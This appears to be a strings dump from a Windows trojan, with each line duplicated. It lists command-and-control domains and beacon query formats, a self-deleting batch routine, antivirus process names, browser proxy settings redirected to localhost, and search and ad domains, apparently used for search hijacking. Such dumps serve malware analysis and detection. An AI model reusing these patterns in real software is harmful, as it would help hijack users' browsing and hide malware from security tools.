%s_%d_%d_%d_%d
%s_%d_%d_%d_%d
%s_%s
%s_%s
http://xprstats.com/k1.php
http://xprstats.com/k1.php
type=%s&system=na&id=%s&status=%s
type=%s&system=na&id=%s&status=%s
t=st&q=%s
t=st&q=%s
%s?tq=%s
%s?tq=%s
TMFLDMN%d
TMFLDMN%d
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118
%s_%s_%d
%s_%s_%d
_1_%d
_1_%d
_2_%d
_2_%d
_3_%d
_3_%d
_4_%d
_4_%d
grizlybigtit.com
grizlybigtit.com
cloudstorepro.com
cloudstorepro.com
remindmeroster.com
remindmeroster.com
yordatazone.com
yordatazone.com
sitystorefor.com
sitystorefor.com
datastorepro.com
datastorepro.com
onlinepdahelpforyou.com
onlinepdahelpforyou.com
remarkreddomas.com
remarkreddomas.com
transfersakkonline.com
transfersakkonline.com
backupdomaintolevel.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
SELECT_RESERV_SRV_%d
http://%s.%s
http://%s.%s
%s.%s
%s.%s
stor.cfg
stor.cfg
exec%s
exec%s
%s_%d_%s
%s_%d_%s
id=%s&c=%d
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d_%d
%s_%d_%d
%s_%d_%d
%s %s
%s %s
%s start%s%c%s
%s start%s%c%s
c1.exe
c1.exe
c2.exe
c2.exe
c3.exe
c3.exe
DWN_CON_STRP_%d_%s
DWN_CON_STRP_%d_%s
http://
http://
http://%d.ctrl.%s
http://%d.ctrl.%s
logo.png
logo.png
img/135.png
img/135.png
img/136.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?sv=%d&tq=%s
%s/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
http://binghamtonschools.org/images/297893.jpg
http://binghamtonschools.org/images/297893.jpg
http://binghamtonschools.org/images/297894.jpg
http://binghamtonschools.org/images/297894.jpg
http://alleducationalsoftware.com/creditcardlogos.gif
http://alleducationalsoftware.com/creditcardlogos.gif
http://alleducationalsoftware.com/creditcard.png
http://alleducationalsoftware.com/creditcard.png
http://alleducationalsoftware.com/creditcard2.png
http://alleducationalsoftware.com/creditcard2.png
http://patentgenius.com/temp/head.png
http://patentgenius.com/temp/head.png
http://patentgenius.com/132.gif
http://patentgenius.com/132.gif
http://patentgenius.com/133.gif
http://patentgenius.com/133.gif
http://freedownload3.com/screenshot/4/s/89_3276.gif
http://freedownload3.com/screenshot/4/s/89_3276.gif
http://freedownload3.com/screenshot/4/s/89_3277.gif
http://freedownload3.com/screenshot/4/s/89_3277.gif
http://freedownload3.com/screenshot/4/s/89_3278.gif
http://freedownload3.com/screenshot/4/s/89_3278.gif
http://istockanalyst.com/png/intel.gif
http://istockanalyst.com/png/intel.gif
http://istockanalyst.com/png/intel.jpg
http://istockanalyst.com/png/intel.jpg
http://istockanalyst.com/12.jpg
http://istockanalyst.com/12.jpg
http://complaintsboard.com/complaints/logo.png
http://complaintsboard.com/complaints/logo.png
http://complaintsboard.com/complaints/zip.png
http://complaintsboard.com/complaints/zip.png
http://complaintsboard.com/complaints/rar.png
http://complaintsboard.com/complaints/rar.png
http://highspeedinternetlosangeles.webnode.com/news/1.cgi
http://highspeedinternetlosangeles.webnode.com/news/1.cgi
http://highspeedinternetlosangeles.webnode.com/news/1.php
http://highspeedinternetlosangeles.webnode.com/news/1.php
http://highspeedinternetlosangeles.webnode.com/news/2.php
http://highspeedinternetlosangeles.webnode.com/news/2.php
http://newworldorderreport.com/favicon.ico
http://newworldorderreport.com/favicon.ico
http://newworldorderreport.com/img/3421.png
http://newworldorderreport.com/img/3421.png
http://newworldorderreport.com/img/3422.png
http://newworldorderreport.com/img/3422.png
http://jointhenewworldorder.com/images/pages.jpg
http://jointhenewworldorder.com/images/pages.jpg
http://jointhenewworldorder.com/images/pages.png
http://jointhenewworldorder.com/images/pages.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
http://cdn.adventofdeception.com/logo.png
http://cdn.adventofdeception.com/logo.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
t=ip&hrs=%d&q=&s=1
%s?sv=%d&tq=%s
%s?sv=%d&tq=%s
\bl%d_64.bat
\bl%d_64.bat
del "%s"
del "%s"
if exist "%s" goto a
if exist "%s" goto a
cmd.exe /c "%s"
cmd.exe /c "%s"
GET %s HTTP/1.1
GET %s HTTP/1.1
Host: %s
Host: %s
User-Agent: chrome/9.0
User-Agent: chrome/9.0
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
ahst.lni
milktoyoustudios.com
milktoyoustudios.com
http://%s/s.php?c=121&id=%s
http://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
bigbulkhypnocrys.com
http://xprstats.com/images/logo.png
http://xprstats.com/images/logo.png
drweb
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
t=ml&q=%s
xprstats.com
xprstats.com
http://%s%s
http://%s%s
%s_1_%d_%s
%s_1_%d_%s
%s_2_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_3_%d_%s
%s_4_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
pmv=2&id=%s&hwid=%s
u.exe
u.exe
%s up%s
%s up%s
&%s=%s
&%s=%s
avgnt.exe
avgnt.exe
AVGIDSAgent.exe
AVGIDSAgent.exe
avgwdsvc.exe
avgwdsvc.exe
ccsvchst.exe
ccsvchst.exe
AvastUI.exe
AvastUI.exe
mcagent.exe
mcagent.exe
PRM_LSTN_THIS_PORT
PRM_LSTN_THIS_PORT
Opera
Opera
127.0.0.1
127.0.0.1
HTTP/1.x
HTTP/1.x
google.com
google.com
http://www.google.com
http://www.google.com
HTTP/1.1 302 Found
HTTP/1.1 302 Found
Location: %s
Location: %s
id=%s&type=%d&ppcid=%s
id=%s&type=%d&ppcid=%s
%s: %s
%s: %s
%s_5_%s
%s_5_%s
http=127.0.0.1:
http=127.0.0.1:
prefs.js
prefs.js
Mozilla
Mozilla
"network.proxy.http"
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.http_port"
"network.proxy.type"
"network.proxy.type"
"127.0.0.1"
"127.0.0.1"
%s(%s, %s);
%s(%s, %s);
operaprefs.ini
operaprefs.ini
Use HTTP
Use HTTP
HTTP server
HTTP server
127.0.0.1:%s
127.0.0.1:%s
%s=%s
%s=%s
%s:%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
id=%s&hwid=%s
exec|%s
exec|%s
http=
http=
HTTP/1.0 200 OK
HTTP/1.0 200 OK
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
bing.com
yahoo.com
yahoo.com
search.aol.
search.aol.
suche.aol.
suche.aol.
searcht2.aol.
searcht2.aol.
.yimg.com
.yimg.com
.bing.net
.bing.net
scorecardresearch.com
scorecardresearch.com
brightcove.com
brightcove.com
.aol.
.aol.
.atwola.
.atwola.
.ivwbox.
.ivwbox.
.atdmt.
.atdmt.
.abmr.
.abmr.
.tacoda.
.tacoda.
.adtechus.
.adtechus.
.autodatadirect.
.autodatadirect.
.mapquestapi.
.mapquestapi.
.ggpht.
.ggpht.
.virtualearth.
.virtualearth.
.opera.
.opera.
.microsoft.
.microsoft.
.wsod.
.wsod.
.doubleclick.
.doubleclick.
.ypcdn.
.ypcdn.
.truveo.
.truveo.
.tlowdb.
.tlowdb.
mapq.st
mapq.st
.dartsearch.
.dartsearch.
.thawte.
.thawte.
http://
http://
bing.com/search
bing.com/search
bing.com:80/search
bing.com:80/search
search.yahoo.com/search
search.yahoo.com/search
%s_1_%s
%s_1_%s
err%d%s_%d_%d
err%d%s_%d_%d
err0%s_%d_%d
err0%s_%d_%d
ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s:443/%s
%s_2_%s
%s_2_%s
%s_%s_%s
%s_%s_%s
%s_3_%s
%s_3_%s
www.www.ru
www.www.ru
https://
https://
.doubleclick.net
.doubleclick.net
doubleclick.net
doubleclick.net
msn.com
msn.com
%s_0%d_%d
%s_0%d_%d
=='undefined'?'%s':'%s'
=='undefined'?'%s':'%s'
.referrer
.referrer
HTTP/1.0
HTTP/1.0
%s %s %s
%s %s %s
http://www.google.com/
http://www.google.com/
http://www.yahoo.com/
http://www.yahoo.com/
.class
.class
.midi
.midi
google_ad.url
google_ad.url
google_ad.title
google_ad.title
r.msn.com
r.msn.com
google_ad.line1
google_ad.line1
zcÁ
zcÁ
c:\%original file name%.exe
c:\%original file name%.exe
%Program Files%\CF2C6
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\4645
%Program Files%\LP\4645
GetCPInfo
GetCPInfo
RegFlushKey
RegFlushKey
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
WinHttpReadData
WinHttpReadData
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpOpen
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpSendRequest
WinHttpConnect
WinHttpConnect
WinHttpCloseHandle
WinHttpCloseHandle
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
RPCRT4.dll
RPCRT4.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
WINHTTP.dll
WINHTTP.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
mscoree.dll
mscoree.dll
nKERNEL32.DLL
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
Dr.Web
Dr.Web
mhttp=127.0.0.1:%d
mhttp=127.0.0.1:%d
http://www.yahoo.com
http://www.yahoo.com
2.0.2.1
2.0.2.1